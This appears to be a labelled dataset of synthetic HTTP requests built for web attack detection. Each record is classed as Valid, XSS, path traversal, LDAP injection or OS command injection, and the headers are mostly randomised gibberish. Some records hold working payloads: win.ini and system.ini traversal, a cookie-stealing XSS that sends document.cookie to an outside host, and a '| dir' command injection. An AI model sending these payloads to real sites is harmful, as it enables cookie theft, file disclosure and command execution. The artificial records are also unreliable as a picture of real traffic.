Upgrade: 7sfngt/9.6, ace6m/0.4, rraab8/8.8, ewau/0.8, 6eest/4.1
Warning: 272 www.ineutIx.jpg:5 "asndsepgt" 
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49251
Start - Id: 38835
class: LdapInjection
GET /reuiehGiae8taerilg/1peaWelsnh3htksos/dUtvoycy98Jr@5NJ/oEtZhsehhaniirts1c/processing-instructionKTPeJ/ezFindlr/fDdU6g.gif?rHevuAttr=rw&hvsntdf=ypej7tsAsb&sewbJc0=oiieh%3A&sbeditxoErros=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&lleei=pstylem&Aoibti5=i8&wMKoT=65&D8LbbIlADJW=%7EEEnei%3Dnechonc&cs2e3mq=taiioextmAgSE&niftur1tk2hcadp=drop+5edo%3Aet%5C&Y8childEVnlinkNb0.Y=ae&9K1G6f=uoexea&smo=em%3Brup&uqhonua=lFMBvUUb%40 HTTP/1.0
Host: www.ttchms.gov
Connection: oIfxtt7
Accept: application/rtf, application/x-tar;q=0.4, application/x-tar
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: qe=wcx2
Client-ip: 244.46.205.26
Cookie: 7thepd9iilaevv3=hsTr;aiceneedfahh=3830941;nr=de4euEut0is
Cookie2: $Version="62"
Date: Tue, 03 Feb 04 02:29:56 CET
ETag: W/"h6MB8nr3He6wdxV5k"
Expect: 100-continue
From: oeee@geqtla3o.org
If-Modified-Since: Fri, 27 Oct 06 22:20:13 GMT
If-Unmodified-Since: Thu, 19 Apr 07 13:42:17 CET
If-Match: "w_H6AkW9grgxgMz3ZFz_"
If-None-Match: "tOlK3yRJJN9QpqiLdp6"
If-Range: "cMRmx-stb29QkvqcJj"
Max-Forwards: 110
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: NTLM MW1rcmkxZjZ6dm5zbnJlOW4zMWlhbmVka2F0ZTJsOHQ4aXRycnM3aWVmb3cyb0t0
Range: 088-865,-53,38290-
Referer: http://www.eosklm.it/XenO3rrs/dren.mpeg
TE: deflate,chunked;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/8.2 (compatible; Konqueror/0.1; Linux i386; bius9Nnmur; lrtemwI)
UA-CPU: PowerPC
UA-Disp: 3032,6825,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 072x4241
Via: 2.0 32.101.50.135, 1.1 142.173.223.235
Transfer-Encoding: Noat; y9giiF=IeF5en
Upgrade: 5e2/8.1, neual/2.6, shex0/3.0, srtfSe/9.7
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 19.112.51.121
X-Serial-Number: 465738
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38835
Start - Id: 36233
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.m4osuo.gov
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: et5sa-n;q=0.4, a2iosie-ezimgede;q=0.5, nede-r;q=0.9
Cache-Control: no-transform
Client-ip: 58.131.95.224
Cookie: x0dZLI1J=dknMuRVCjq
Cookie2: $Version="298"
Date: Fri, 20 Apr 07 15:42:26 CET
ETag: W/"8L1zDi@l4whkRcc"
Expect: 100-continue
From: tiieepnr@xgthjtra.biz
If-Modified-Since: Sat, 09 Apr 05 04:42:53 CET
If-Unmodified-Since: Tue, 30 Jun 09 19:49:34 CET
If-Match: "P8lnrdYrZPezRzvLO"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Snrsty Ltrl=eythSgjt
Authorization: Basic YXVlQ3RnZTpFT3N0MWFl
Range: 183-
Referer: http://T3qe.org/6oxssrsb/stCb/e2nae.jsp
TE: trailers
Trailer: Accept-Language
User-Agent: xRqi/5.7
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Solaris
Via: HTTP/8.1 www.hiQs.shtml
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: ahpnCe/3.0, aehm/4.9, kHt/9.5, de3Dh/9.6
Warning: 431 www.pThasq.css:58824 "eb5khn7Ir" "Wed, 20 Oct 04 17:02:16 UTC"
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36233
Start - Id: 28488
class: Valid
GET /M5QMp8ssnn/rW76E25uCUYiJ2KwkT/6@SZHc1hXW/epeaimpteforgsetzast/RlAmO.jpeg?t7dwi0e3=tnn3jr3bSYH&vuursh0fiEyergs=esautoexec7Gipisht&ddpfes4=wty+&Pt7dwp-9J=Uhfilh5sno&J8g0.g=6417536&xV8H4f=e%40s&hDp7km=313210&h5=346&eebic=630&hvAu=18&scrmaInylgane=eisobd2umnTr3rdy&HHEATHdwV@Oi=ndpodenOdn%25dee&Ytaso5ses0=h04-z%40&lnc=ht HTTP/1.1
Host: 169.153.84.59
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: windows-1252, x-mac-chinesetrad, windows-1251;q=0.5, windows-1255;q=0.9
Accept-Encoding: 
Accept-Language: daaaDy-twcaobe, dho-vArth;q=0.5, uQe-Imhbh, ssk-o
Cache-Control: max-stale
Client-ip: 224.203.86.175
Cookie: tIr57e4twd=oat;w5sisAlc8pll=isf;og4eia= tnuI;serreawreaee=21284
Cookie2: $Version="77"
Date: Sun, 03 Apr 05 06:12:43 UTC
ETag: "Wk4KQloP1FWKrsVUXgTm"
Expect: 100-continue
From: tnt1hws@edhstto.cz
If-Modified-Since: Wed, 11 Oct 06 16:24:31 CET
If-Unmodified-Since: Thu, 29 Apr 10 01:28:35 UTC
If-Match: "1@5fSMP-AwJXg6RLgYrY"
If-None-Match: *
If-Range: Sun, 18 Dec 05 24:17:18 CET
Max-Forwards: 504
MIME-Version: 1.7
Pragma: enahe='oricoe'
Proxy-Authorization: et2e taNgj=ss0tnse
Authorization: NTLM ZnllZWxvdGRzb3c3ZFJIdGh6T2RiT2F0dGhhZHllZmVkdnRz
Range: 5-,-182
Referer: /ibeaneNs/nsieh.bin
TE: gzip
Trailer: Accept-Encoding
User-Agent: otihct3cbegvgic
UA-CPU: x86
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8998x777
Via: 9.4 119.6.150.167, 6.1 58.217.127.144, 9.5 166.12.137.187
Transfer-Encoding: deflate
Upgrade: eoMrti/3.9, a3a/8.8, hicis/1.4
Warning: 107 www.iwhhs.shtml "74siedtii" 
X-Forwarded-For: 243.229.193.59
X-Serial-Number: 623138
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28488
Start - Id: 47293
class: XSS
GET /qZa/loilodtEIusdbeOejhnr/dUolk@cX9VpUKP/3pbj2vX2/aCEG-XTHU9NdeY0R--Y/RnSp/icEnnnineirnmstaeD/mjpLrO7CsWj7ERxe4Ood/rdYy8choDvhfgkSahmc/ndqn.png?OavMnD=%3Cimg++++dynsrc+++%3D++++%22++javascript%3A+++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.as.com%2Fcgi-bin%2Fneto.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E&s9iaLno8=320&aAncnd7lhseeoae=etcchue5is1jr&mtemLwniadat7=htpass++4mvarfiercte HTTP/1.0
Host: www.roorhf.uk:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-9;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale=34
Client-ip: 156.129.47.155
Cookie: rpLQEexecbcr=2890;Ifnnfonl=77903127;seitemxrrTimat=:gandue
Cookie2: $Version="1"
Date: Sat, 10 Jun 06 11:29:59 CET
ETag: W/"Ti_gfcR2jdX5V4dGY0n"
Expect: mTIktib
From: peTeu9@mayraae.fr
If-Modified-Since: Fri, 12 May 06 12:24:41 CET
If-Unmodified-Since: Mon, 14 Sep 09 15:13:42 UTC
If-Match: "YaFE6RKy-jHUuMTeiJ"
If-None-Match: "GcZHi2whA6FPACm0_"
If-Range: Thu, 18 May 06 01:02:06 GMT
Max-Forwards: 758
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: rjne svdhj5us=dhtnra
Range: -4,7256-5,39-5314
Referer: /ntnsl/aglstd/litec/qmse/hdAonda.asmx
TE: gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/6.3 (X11; U; Solaris 9.9; ir-qt; rv:7.5.3) Gecko/48634893
UA-CPU: Sparc
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 979x278
Via: 5.3 10.250.186.184, FTP/5.4 129.12.128.189
Transfer-Encoding: deflate
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 136.201.136.92
X-Serial-Number: 269675731221597037
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47293
Start - Id: 45269
class: PathTransversal
GET /oa/ltyEqisHmcAC/5tK8ILj2610XFzO/c8LbetweenkmailjUitQsuIo/aXafH7ZqI5fts7Ndl/y0ly/or8PEeo0Hpn.shtml?geCjcn3netInfl=stdin&DCJgVwinntkN=27950&iu1eanuea=61&WGO7=Tr&ahhbezTeOE9ssbe=eanarmgEsdu1cpete&9ne2er=2026862059&sh=4567&tjmlaesa5TgTyvr=telnetapiedepsg&allSCVg@binQbZ=aeue%242&QSovoeiiz=okse&oUtTxvoblU=8822674&mmhib=go9iAbznBSx&mKP4H2xOivy=%5Ca%3Bum%3Clc-ce%40gne%7E&EytAarooairah=d_6ygyMJP&h-autoexecandM=+haalo%25 HTTP/1.1
Host: 135.88.68.20
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9, x-mac-roman, x-mac-arabic, iso-10646-ucs-2;q=0.7, euc-jp;q=0.7
Accept-Encoding: gzip;q=0.5, identity, deflate, deflate;q=0.7, gzip
Accept-Language: satoe2wt-etr;q=0.6, 0nrM6a-mrui3ry;q=0.3
Cache-Control: max-age=7496
Cookie: pesaatoR56y=f;noqu=0606;IiauttpR=sphWeatweeM
Cookie2: $Version="48"
Date: Sun, 25 Dec 05 11:42:45 CET
ETag: "_6bFj6M4O-5p6MfZP_"
Expect: 100-continue
From: ra7rtweh@ttrsy.org
If-Modified-Since: Fri, 24 Aug 07 03:13:35 UTC
If-Unmodified-Since: Tue, 27 Jan 04 16:30:57 GMT
If-Match: "4fE58BjNK4ust0o"
If-None-Match: "APUUCG3kwkTUo5cNtCwb"
If-Range: Wed, 31 Oct 07 04:42:52 CET
Max-Forwards: 8
Pragma: no-cache
Authorization: NTLM WWV0eW9zZWR5U2tFdGhzZWw5aWZ0Y3NzdThvaGFzbDF0cncwVmhldGE=
Referer: http://9zyFrazn.com/scpNn.asp
TE: chunked,trailers,trailers
User-Agent: o:\autoexec.bat
UA-CPU: Sparc
Via: rlin/3.4 210.103.236.155
Transfer-Encoding: deflate
Upgrade: rY7u/3.8, gk6/3.2, o8xHs/4.5, eog/8.6

null

End - Id: 45269
Start - Id: 14846
class: Valid
GET /oyvTboJ@q1v/bLxp5C-6QxHfYkTw60o/fEECBh6E/a.zvHiO-ccm/zymcselectxDVK_31/01O0mVlbi.asp?YXiSxp_mgXEV=etbTBx8oeEsjpps&rht=nph-l0t&gsst=12&rFe8KfX@=%27l++t&icautnd9sfZlosh=4299477&t1xtt=t.WV_bd&eysp=tnA%3Fte9t&sb=546 HTTP/1.1
Host: 195.203.214.7
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: rfen-onsc, ExTIwsi-aniakil;q=0.8
Cache-Control: no-transform
Client-ip: 203.219.108.148
Cookie: cth9r=neead9eRatg;qreee=811729837;ioutgftCttho=e7dc3?)eopt
Cookie2: $Version="14"
Date: Thu, 28 Jun 07 12:07:47 CET
ETag: W/"Jrh_doB3SiN0uka6@"
Expect: minii
From: dohhb@poT3eth.fr
If-Modified-Since: Sun, 15 Jul 07 15:30:29 UTC
If-Unmodified-Since: Mon, 27 Oct 08 14:06:46 CET
If-Match: *
If-None-Match: "BVSUCb6G92_J3Dp"
If-Range: *
Max-Forwards: 76
MIME-Version: 2.8
Pragma: y='6cu1uoyp'
Proxy-Authorization: Basic cWVhYzp3ZHJOdGFrZQ==
Authorization: NTLM aWRIb3lhczlvc3Njc2hsc2VmZnJNZ2JpenRzNGVMc2F2aTJF
Range: 974110-
Referer: http://www.oold.org/r9sden1/oietfa/Nij58.asmx
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.0 (X11; U; Linux i386 8.8; pn-po; rv:3.2.4) Gecko/15703379
UA-CPU: 68000
UA-Disp: 3034,218,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 923x8805
Via: 8.6 32.240.184.178, FTP/4.5 www.Ao4rt0iw.css:115, 2.8 152.83.155.73
Transfer-Encoding: compress
Upgrade: altl/2.2
Warning: 396 135.99.201.170 "ensfieereprG" 
X-Forwarded-For: 175.103.200.117
X-Serial-Number: 89813
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14846
Start - Id: 36142
class: PathTransversal
GET /hltaOsAhti/RbMEZvDVAcI/ecuZAYV/jU5vB8qL7l/6VmCA4MsU/t6t/c-IDGk-oJL.Hi9/exkt.asp?siboel=auenr&uknlis8=5584&t9lpg=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&sg=38896 HTTP/1.1
Host: 2.195.169.164:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: attlo-eehI;q=0.4, hkemji-snooteay;q=0.7
Cache-Control: no-transform
Client-ip: 25.79.74.161
Cookie: rqosnhho3d0me=etl;hiTqmalnt=e5so;rmandd=\'lefnisyn;ioS52lbtr=1;uqWdn=fAlnde4hfoasln0;link-7kCeall=sR3zedoiTTad9
Cookie2: $Version="1"
Date: Fri, 30 Oct 09 20:52:54 GMT
ETag: "1Th7ACFJdKWcpA5LuNZ"
Expect: 100-continue
From: Arat@rNst.com
If-Modified-Since: Tue, 02 Oct 07 07:12:32 GMT
If-Unmodified-Since: Tue, 02 Dec 08 04:05:18 CET
If-Match: *
If-None-Match: *
If-Range: "H8gfUtigzcQqr2VI"
Max-Forwards: 8431
MIME-Version: 1.7
Pragma: tmetu=Etciw
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest qop=hiiaf
Range: -52194,2-,7-21979
Referer: /jt3p/at8o/aWtu/ubDfEdvn/atlCltk.nsf
TE: chunked;q=0.0,chunked
Trailer: Accept-Encoding
User-Agent: dy9eraaamesAuma
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 795x647
Via: 2.0 www.nhN8a5.tiff:42, 2.5 255.157.246.7
Transfer-Encoding: identity
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36142
Start - Id: 26482
class: Valid
GET /anhddeae/ltahnnyttuetSltla/mwSt8oY1i6Ameq6Q.yEv/nxuygd/ihMcf/a-kzrMK9u/ete/ahvkrLn-0VE/hPzOa./OO4h8gX/uuJS1oomHpEG7DVCxWw.tiff?LFBAnullxp_4d0=nitnori&on1f6lneuibcas=sR6gg6&ztonrfllc=0836&weco=326&tOgnihiynnasr=88b HTTP/1.1
Host: www.o8shl.cz:80
Connection: 3byh
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.3
Accept-Language: aa-onenl, t-oa;q=0.0, aec5-lIbsmhyc;q=0.9, luyoeemr-0Pt;q=0.7
Cache-Control: max-age=8287
Client-ip: 86.24.48.140
Cookie: wtn2Me=999
Cookie2: $Version="63"
Date: Thu, 08 Oct 09 22:09:18 UTC
ETag: "bKRQhdYXH-zq3ckab"
Expect: imeiyeat=hnewk
From: r2Sewei@iiwioe8s.st
If-Modified-Since: Sun, 22 Mar 09 04:43:31 CET
If-Unmodified-Since: Mon, 10 May 04 06:22:00 UTC
If-Match: *
If-None-Match: "RIZ6VAZuVQNcxmBncJ"
If-Range: "D2blSbSQYeYBwiGgz"
Max-Forwards: 3
MIME-Version: 4.0
Pragma: ro='tosuzjt'
Proxy-Authorization: Basic OGh0bndTbjpvZHI3clNz
Authorization: 3eroe remq=fngEepte
Range: 68058-
Referer: http://www.ohcc3tB.be/m4mo/ut4sPe.asp
TE: trailers,chunked
Trailer: User-Agent
User-Agent: hjrwd/7.1.4.7.5
UA-CPU: MIPS
UA-Disp: 719,2731,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6499x515
Via: FTP/9.8 35.253.51.208, HTTP/0.2 245.86.219.33:49, FTP/1.3 www.nhoee.tiff
Transfer-Encoding: gzip
Upgrade: arRm/5.7
Warning: 623 17.27.132.164 "djromeklmscjmsfade" 
X-Forwarded-For: 135.109.117.133
X-Serial-Number: 12221288
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26482
Start - Id: 46980
class: XSS
GET /s.LIXv1JFNDiTuW/pVGK98DV8OdjW/omsae5/eTA_2N/iM3REB0dCtn159/locationH/kC8pOMTzL5Fvgd5Yl/e8oehtbeilaeoEir1.asmx?aJ@k%un6K=oyeghlh&eegelsDlKr=%3Cscript+%3Ealert++++%28%27e0haAeoligHeidy.thowi%27%29%3C%2Fscript+%3E HTTP/1.0
Host: www.P26Rtkue.fr:80
Connection: oE5iket
Accept: */*;q=0.7
Accept-Charset: windows-1252, windows-1254, koi8
Accept-Encoding: identity, compress;q=0.5, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 128.77.209.28
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Fri, 07 Oct 05 16:43:08 CET
ETag: W/"1RB7F6M.D6iD7VDJ1x"
Expect: lirmAu=bfd2
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Mon, 30 Mar 09 16:07:55 UTC
If-Unmodified-Since: Mon, 22 Mar 10 03:24:30 CET
If-Match: "hOxhtMCvVseiRGi2K"
If-None-Match: *
If-Range: *
Max-Forwards: 451
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: -299,87-,670-62
Referer: http://4rouhaet.cz/Lrtlzem/ynen/dwjoo.zip
TE: deflate
User-Agent: Mozilla/5.8 (Machintosh; U; Mac OS X 3.2; lR-n0; rv:9.0.1) Gecko/31233526
UA-Disp: 2976,173,32
UA-Pixels: 199x2885
Via: 3.9 www.eceg5aat.html
Transfer-Encoding: gzip
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 174.206.213.130
X-Serial-Number: 09560109
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46980
Start - Id: 42859
class: OsCommanding
GET /i7C9_eA7p/Wzhkb74S2Zz.exe?Otbbe=mt%5D&4ndwi=bllf2ipkORe&wQNdoea=9047658490&sf=eLo-3&z04AQZc=stS&Ls=topdeReaemnnoa&6httpseTdcj=%7C++++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++++%2C&iwxcmid1roa=b69.X1tuc&fyoj1ms94nbbr=odu2bb9aFsra&H9egbeilavja=5emth&iOtotldya=579964&amnoorasl=leoe7net6&cee8niry=620892&tnboglet6Q=dVV%40XKp HTTP/1.1
Host: 51.91.40.42
Connection: OLtg1N
Accept: image/jpeg;q=0.5, text/html;q=0.1, text/plain
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.3, identity
Accept-Language: *;q=0.0
Cache-Control: min-fresh=02
Client-ip: 220.191.86.68
Cookie: hiht=|dacceptnal;hqhttpsSh=q$a;etoot3crh=g8ufIBr
Cookie2: $Version="008"
Date: Fri, 06 Feb 04 14:16:08 CET
ETag: "HnExqP@.ONn5WYu362o"
Expect: ecdm
From: l6tz5hd@ruglhe.be
If-Modified-Since: Sat, 27 Oct 07 21:07:32 UTC
If-Unmodified-Since: Thu, 08 Mar 07 08:42:11 UTC
If-Match: *
If-None-Match: "175dDCQ1MMMyeNUTI"
If-Range: *
Max-Forwards: 6788
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: saRe Tbiro=rihetMz
Range: -865928
Referer: http://qpn4.ch/ntae.jpeg
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: tG@yhO0y. http://www.rosnws.de
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.erkth.tiff, 5.4 www.monrr.css, FTP/7.5 148.61.28.128
Transfer-Encoding: gzip
Upgrade: gds/3.0, ehewef/0.6, eator/3.4, mwnet/5.2, hnta/0.2
Warning: 322 www.3aaua.png "dnycjwts1Uhnsohdc" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42859
Start - Id: 7307
class: Valid
POST /wO/tGkOsZL/ictntisr/iocaashif8nehLcea/308shutdownldropinsert/anp9ZBQj/l34aglGlVwgZh.NI..php? HTTP/1.1
Content-Length: 142
Content-Language: tuee
Content-Encoding: deflate
Content-Location: /id6eql/notha/slmerti.fgf
Content-MD5: YXJUdE90dXZlaWFhaW5jaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Mar 10 19:10:57 GMT
Last-Modified: Fri, 03 Apr 09 22:40:40 GMT
Host: 175.135.176.141
Connection: iedapnn
Accept: text/*;q=0.7, text/*;q=0.9
Accept-Charset: windows-1252;q=0.0, iso-2022-kr, windows-1257;q=0.6, iso-8859-7;q=0.2, shift_jis;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=96
Client-ip: 17.44.116.170
Cookie: kneeier=mand;Aelozt=n;amhBnpnh2ll=t@82PnpR;henr=13;aaudhweK=whereemli;c+l 
Cookie2: $Version="23"
Date: Tue, 22 Jun 04 23:12:02 UTC
ETag: W/"0fipGGrcEvEbFaJ-fJ"
Expect: l5etits
From: ha4h@ntbt8vhFn.cz
If-Modified-Since: Sun, 16 Sep 07 16:31:05 GMT
If-Unmodified-Since: Fri, 28 Apr 06 02:03:34 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: rlbrar tTa3tcon=imcivns
Authorization: Basic SnNkaXo6RXJkdGNv
Range: 843670-7300,78-
Referer: /8ecL/naTfhen/zoneh/aie3fmg.conf
TE: trailers,chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: c1CeXb4I http://www.enmOt.de
UA-CPU: 68000
UA-Disp: 4520,707,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1302x7380
Via: 6.0 www.eswnIAn.png
Transfer-Encoding: gzip
Upgrade: Pcr/6.7, asmrbh/9.1, ayi/9.1
Warning: 465 193.0.29.240 "9tdbganttoetamdoth" 
X-Forwarded-For: 28.214.132.150
X-Serial-Number: 35067124458
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

otm1ekl=7298&ppeaetmosehm=t5&sa=eIHc-m&atne=oJ1BBJMmw&dWat0iita=57&9rt=d83bt&ee7drce=3&a3el=04387035&ha=oYE3fw&0zp0ntjo=ye&Rioeassh=9815111980

End - Id: 7307
Start - Id: 20139
class: Valid
GET /ncCkYm6YS_1VUd_OuzE/n3IxpOrx618Oc./85xHUejxGYN/hVE_nQZJ5yPII8-cn/tinhehrin8lgm6n/@WFS5Ed5Gutt.swf?fco=qva7j&ceiz3=36410419&lohltitWZ=9884994&b8rr=+hmetal&Ernq10n=de&OhhsiEniD6mn=%2Fshome&gls=stnruzRae&dedhzodh7odhuaq=smvhdtnao&xwenc=57111024&wfgpACysp=58971644 HTTP/1.0
Host: www.ayglit8.uk:54529
Connection: close
Accept: */*;q=0.2
Accept-Charset: utf-8, utf-8;q=0.5, x-mac-icelandic, x-mac-korean
Accept-Encoding: identity, compress;q=0.2, gzip, identity
Accept-Language: *
Cache-Control: max-age=4515
Client-ip: 112.70.151.93
Cookie: aeooemlaoti=s
Cookie2: $Version="2"
Date: Sun, 02 Apr 06 24:13:02 GMT
ETag: "UEDIWMBQIfD4d18"
Expect: 100-continue
From: np1ebr9@yntet.it
If-Modified-Since: Sun, 15 Nov 09 02:27:31 UTC
If-Unmodified-Since: Sun, 04 Nov 07 08:18:46 UTC
If-Match: "_egm_GhJu_xLewo@FA"
If-None-Match: "TY0yLK1UxEUvRWY"
If-Range: Sun, 12 Nov 06 20:16:42 UTC
Max-Forwards: 5674
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic dGV0YXM1dHM6bGxVeQ==
Range: 48910-875971,804755-62
Referer: /tTshc/e9mso/desa/TSropew/zisilr4.wmn
TE: trailers,deflate
Trailer: Date
User-Agent: sect5geTnAmvhon
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2245x9664
Via: 7.0 www.enud.js, HTTP/7.4 163.137.218.11
Transfer-Encoding: compress
Upgrade: gsxSw/8.7, hxstE4/2.5, thn/2.2, tad/9.4, rii/8.9
Warning: 998 www.ttRcoh91.jpeg "bE5Jru" 
X-Forwarded-For: 147.125.181.72
X-Serial-Number: 01250528765
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20139
Start - Id: 8742
class: Valid
GET /grr./secztt3eet/ho/lFs34DXoz71ru.htm?gec3eeotIr=hl1T&auawfxvBhclp=5Fek5&6%uevalGz=33530795&spuuemte=78Mli1rB&lqedeokrzuIawI=tW6r.v&idRk6hstyleN=6790672108&AT_Q3k@2pQMtmp=4758527&@_YQlY=pPbN26bW6_AW&fENrr=2&namala=4329887 HTTP/1.1
Host: 33.149.62.253
Connection: keep-alive
Accept: audio/*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 51.229.66.148
Cookie: qfgoptzifjs=Meihsaepoo;noEdrztevlcne=ar@s
Cookie2: $Version="37"
Date: Mon, 29 May 06 19:12:07 CET
ETag: W/"kG3l@WYtqYm_e8XVz2S"
Expect: 100-continue
From: gtRthpn@euhjO9.it
If-Modified-Since: Sun, 07 Mar 10 08:59:15 GMT
If-Unmodified-Since: Mon, 28 Jul 08 03:18:31 UTC
If-Match: *
If-None-Match: "O-2CguMI@WwHu6Aw"
If-Range: Mon, 13 Jul 09 02:23:36 GMT
Max-Forwards: 69
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: twi2ig maenlana=he6iSwdI
Authorization: Digest nc=E82Bd8a6
Range: 291-,7962-175
Referer: /Xris8/3laecnea.shtml
TE: deflate;q=0.0,trailers,trailers
Trailer: If-Match
User-Agent: a_epsf http://www.lUnjeokO.de
UA-CPU: PowerPC
UA-Disp: 036,8992,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 323x9926
Via: fNia/2.7 49.102.206.169, 8.0 www.hcuea.jpg
Transfer-Encoding: deflate
Upgrade: nr2n/6.6, c8dm/9.0, eih/0.8, mee/9.2
Warning: 196 69.31.102.112 "meOretmuAnoa24aNg" "Sun, 13 Nov 05 21:30:28 UTC"
X-Forwarded-For: 85.79.219.185
X-Serial-Number: 14852095010495286519
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8742
Start - Id: 15231
class: Valid
GET /nat/5ipcatbdaAd/zSO0IKRZW2uk1ys-w/nullLReAcLNSFL0kD0/ciframefhomel-bNOoo6NE.jpg?anwjks=qVoon&aee5=lCt%25processing-instruction&fniDWeawrulssl=%3Flibftc+hu&X890nCb8P8om=xAo&Ajan=ceihirr&i7iSstr=a6un2&sv1Ty5NN=98733&9tdPigbe=p%40yGpob8s&90lsYsootlptn=eDurv_Dfsgdt HTTP/1.1
Host: www.NoTono1.de
Connection: close
Accept: text/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=2
Client-ip: 169.143.137.176
Cookie: eju=processing-instructionch<e nli;fta8bawi=hlien;LOCSxl16=apZqpRz9;uuierbm=oujei5eewc2x
Cookie2: $Version="9"
Date: Thu, 24 Aug 06 17:22:21 GMT
ETag: W/"UM3IkIbhFRCKBh_TB"
Expect: 100-continue
From: rwLjhtn@hMidWa4.fr
If-Modified-Since: Sat, 31 Dec 05 22:12:46 GMT
